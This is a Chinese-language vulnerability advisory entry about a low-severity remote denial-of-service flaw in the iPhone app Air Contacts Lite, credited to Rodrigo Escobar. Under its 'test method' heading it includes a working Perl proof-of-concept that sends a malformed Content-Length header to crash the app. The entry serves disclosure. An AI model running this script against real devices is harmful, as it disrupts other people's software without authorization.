ZeroBox Vulnerability Database

漏洞起因
异常条件处理失败错误
危险等级
低
 
影响系统
i-NOVATiON Air Contacts Lite
 
不受影响系统
 
危害
远程攻击者可以利用漏洞使服务程序崩溃。
 
攻击所需条件
攻击者必须访问Air Contacts Lite。
 
漏洞信息
Air Contacts Lite是用于iPhone上的用于与Mac或PC交换联系人的应用程序。
向程序发送特制的HTTP报文，可导致应用程序崩溃。
 
测试方法
# Air contacts Lite (Denial of Service)
#!/usr/bin/perl
use IO::Socket;
      if (@ARGV < 1) {
              usage();
      }
      $ip     = $ARGV[0];
      $port   = $ARGV[1];
      print "[+] Sending request…\n";
      $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
      print $socket "GET http://www.dclabs.com.br HTTP/1.1\r\n";
      print $socket "Host: http://www.dclabs.com.br\r\n";
      print $socket "Content-Length: 0\x78\x41\x71\x69\r\n\r\n";
      sleep(2);
      close($socket);
      print "[+] Done!\n";
sub usage() {
      print "[-] DcLabs – Air Contacts Lite (DoS)\n\n";
      print "[-] Usage: <". $0 ."> <host> <port>\n";
      print "[-] Example: ". $0 ." 127.0.0.1 80\n";
      exit;
}
 
厂商解决方案
目前没有详细解决方案提供：
http://itunes.apple.com/us/app/air-contacts-lite/id308475228?mt=8
 
漏洞提供者
Rodrigo Escobar